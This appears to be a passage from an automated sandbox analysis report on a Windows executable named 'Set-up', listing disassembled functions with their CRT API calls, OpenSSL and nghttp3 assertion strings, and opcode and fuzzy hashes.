                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
                                • API String ID: 1222420520-645767172
                                • Opcode ID: fff28e5b11fc6161205ab854c7625eedb40c586ce9de7dd1307153ac230abf1f
                                • Instruction ID: e485c349e001ccfb4e8b43cd10cbbc2b670aa17fadaa4c1e144314ae63fabac4
                                • Opcode Fuzzy Hash: fff28e5b11fc6161205ab854c7625eedb40c586ce9de7dd1307153ac230abf1f
                                • Instruction Fuzzy Hash: F351F775A043148FD7049F28D890B6AB7D6EFA8314F19467CEC999B382EB34DD05CB91
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,0018836A,?,?,0000012C,000000FF), ref: 003049BA
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$_time64
                                • String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
                                • API String ID: 3821555430-713967112
                                • Opcode ID: 1afe0beb284818ef164ccb4a1a2d9ce56f7c3292a5ea0f8ced2138a118c87296
                                • Instruction ID: 4d5ead89594e3f7a1d34311d96c2c96dd892edb61aaa5f2a419ce35c4cfa7fbd
                                • Opcode Fuzzy Hash: 1afe0beb284818ef164ccb4a1a2d9ce56f7c3292a5ea0f8ced2138a118c87296
                                • Instruction Fuzzy Hash: 8541D4B6F4830077DA107A65EC42F5B77558F94754F094138BE4C9B3C2E579FA208AA3
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 001B468C
                                Strings
                                • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 001B4687
                                • nghttp3_conn.c, xrefs: 001B4682
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 1222420520-4133914617
                                • Opcode ID: 79648826609f92ba661cf045908f2cc1a6bb50040542562d5db215d3f7f7eef4
                                • Instruction ID: 375dd47a3b80f5f395d0772cec1b7a8186e111a4e6f6c0ac5958ca0fb0724ffe
                                • Opcode Fuzzy Hash: 79648826609f92ba661cf045908f2cc1a6bb50040542562d5db215d3f7f7eef4
                                • Instruction Fuzzy Hash: B531F0756002056FD610DE28EC85EEBB7E8EF96369F040629F958C3282EB31E814C7A1
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 001B44B7
                                Strings
                                • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 001B44B2
                                • nghttp3_conn.c, xrefs: 001B44AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 1222420520-4133914617
                                • Opcode ID: f1b73c6937a6faba4527f66395104906989c13da3a1f6a8205c1da8bf503d332
                                • Instruction ID: d26b96fea8f755d95de10b447dd0cf0d8172494599c18a73b7615e8fc95a2aba
                                • Opcode Fuzzy Hash: f1b73c6937a6faba4527f66395104906989c13da3a1f6a8205c1da8bf503d332
                                • Instruction Fuzzy Hash: 0221F276100605AFEB115F64DC01FE777DEAF96365F044468FA18C61A3EB3AD4248761
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0048A161
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0048A2D1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0048A3EC
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0048A499
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 6c7f82e55466ba9c5410bff703574377c473357d8b6ae2fa71727c8e075c28f9
                                • Instruction ID: 11f58f46cb195955a0226baa3bb966b325b731a60d6ced10a560bd721059910c
                                • Opcode Fuzzy Hash: 6c7f82e55466ba9c5410bff703574377c473357d8b6ae2fa71727c8e075c28f9
                                • Instruction Fuzzy Hash: 42C1A1716042009FDB04EF2CC888A1E7BA5BF89714F19496EFC498B356D7B5EC50CB8A
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0018D7A7,?,?,0018D7A7), ref: 001B61CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: i < len || offset == 0$nghttp3_stream.c
                                • API String ID: 1222420520-1528673747
                                • Opcode ID: e32c80ec8ec1beeca881f4df1d6ced64bd24fc753da3bae61469a30b11c8183c
                                • Instruction ID: d8b3bebb399f39664224c9fc04ae96c01b79773d1692606a4c281d42529a9a71
                                • Opcode Fuzzy Hash: e32c80ec8ec1beeca881f4df1d6ced64bd24fc753da3bae61469a30b11c8183c
                                • Instruction Fuzzy Hash: EE115EB55043048FD304EF28D898FE6B7E4EB98324F0904BDE949473A2D7346945CB91
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,001B88D3,00000010,?,?,00000000,001B9AE3,001BACDD,-00000010,?,?,?,00000000,?), ref: 001B873C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
                                • API String ID: 1222420520-1502420682
                                • Opcode ID: 17128e061bf63f1b9b8ea2b0735da0e24770955d1551ad9261ec933ac7813357
                                • Instruction ID: 32b074927b99f04f04a4cfc9a5acd5717f8b4fd411c8c64b4fdd5c37e4bf73e0
                                • Opcode Fuzzy Hash: 17128e061bf63f1b9b8ea2b0735da0e24770955d1551ad9261ec933ac7813357
                                • Instruction Fuzzy Hash: E211D6B5A09340AFC3129F14DC01B96BFB4AF52B18F1D8599E848AB2D3DB349C04C792
                                APIs
                                • _byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,001B5084,?,?), ref: 001B8A31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _byteswap_uint64
                                • String ID: nghttp3_conv.c$nghttp3_get_varint
                                • API String ID: 1624361598-912089391
                                • Opcode ID: fda592ee83d1d07d7914401739c538468767248c52d5b846e87f9dd7b94b8f3a
                                • Instruction ID: 47f2cc0c0e035626628d5fc9d4e4f0904409d7abca3d65f0880062ab5e16672d
                                • Opcode Fuzzy Hash: fda592ee83d1d07d7914401739c538468767248c52d5b846e87f9dd7b94b8f3a
                                • Instruction Fuzzy Hash: 18F0F6B151014297D7049F38D801928B7A2EB86712F48C2E5F094CA0C4CB7CC981E711
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,001C0B2D,5308C483,00000000,001B4D9F,?,001B0EC8), ref: 001B0333
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
                                • API String ID: 1222420520-1879435254
                                • Opcode ID: 99fc26709c4a3691b92dc0e93981219a19beb23cbc69d015272eaadbff422354
                                • Instruction ID: 90ccfa63626619cd84369076efd0023c5b535d1f698caf52b1d2f32520f489dc
                                • Opcode Fuzzy Hash: 99fc26709c4a3691b92dc0e93981219a19beb23cbc69d015272eaadbff422354
                                • Instruction Fuzzy Hash: D5E039382006049FCA198B15D949A66B7F1BF8D726F98C298F4098B2F2DB35DC02DA01
                                APIs
                                  • Part of subcall function 002E9F60: GetStdHandle.KERNEL32(000000F4), ref: 002E9F76
                                  • Part of subcall function 002E9F60: GetFileType.KERNEL32(00000000), ref: 002E9F83
                                  • Part of subcall function 002E9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 002E9FBB
                                • raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,002ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,002EDF70,?,?,?,?,?,?,?,00000000), ref: 002EA18B
                                • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,002ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,002EDF70,?,?,?,?,?,?,?), ref: 002EA195
                                Strings
                                • %s:%d: OpenSSL internal error: %s, xrefs: 002EA17C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: File$HandleTypeWrite_exitraise
                                • String ID: %s:%d: OpenSSL internal error: %s
                                • API String ID: 2477291680-569889646
                                • Opcode ID: 487c891abaae3408a02d6a7b446ed209454e08f007aac8d4856bef79a9c9be81
                                • Instruction ID: 09ddf3dae5b866066555ae1bf0dff4f6f6bfba1c5b44468aa1845ec4ad78ca0a
                                • Opcode Fuzzy Hash: 487c891abaae3408a02d6a7b446ed209454e08f007aac8d4856bef79a9c9be81
                                • Instruction Fuzzy Hash: 5CC022B2980341BBEF027E814C03A3AB8206F22704F081C2DB204200D39AA38234A74B
                                APIs
                                  • Part of subcall function 00638600: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638618
                                  • Part of subcall function 00638600: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638634
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00638775
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0063877D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00638796
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006387B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$calloc
                                • String ID:
                                • API String ID: 3095843317-0
                                • Opcode ID: e02476b3b6dd6bf0acefb0d4685dd3d7c105711cd3208b6e3ba0905aaeca323b
                                • Instruction ID: f92ed281a20753403db8a60934c362acf18da7e67140d0bbc3bb6f23c12e0020
                                • Opcode Fuzzy Hash: e02476b3b6dd6bf0acefb0d4685dd3d7c105711cd3208b6e3ba0905aaeca323b
                                • Instruction Fuzzy Hash: 1931B4B4604B019FC710EF6AC4C059ABBF6FF99710F108A2DE99987741DB34E885CB92
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 00494266
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 0049427A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 00494285
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 00494290
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 05352d99cb5b6707c836cd8866524aee76852dcfb9852425cb184d5e69757df9
                                • Instruction ID: 844c15d7ce1c0754866120fc786b179d2e297cdbc5bc465457d29bed88029e23
                                • Opcode Fuzzy Hash: 05352d99cb5b6707c836cd8866524aee76852dcfb9852425cb184d5e69757df9
                                • Instruction Fuzzy Hash: 1801A276A001008FEE609B59E441D17BBD5AFD13A8F09807EE449CB362D638EC41CB85
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0046D8A5,?), ref: 0048281B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482826
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482831
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0048283A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: d06baf8957ef96d7a6d475749e0039a2886766f8ae01318c45b95ee976058131
                                • Instruction ID: cd582b502a5eaf00e943b198dbed53be0662642dc3450ca8899419a2eb3fab24
                                • Opcode Fuzzy Hash: d06baf8957ef96d7a6d475749e0039a2886766f8ae01318c45b95ee976058131
                                • Instruction Fuzzy Hash: 4CD012B6C0551057FD123A15BC0244B7A905F6133CF08063EF845A1666EA16AD2595C7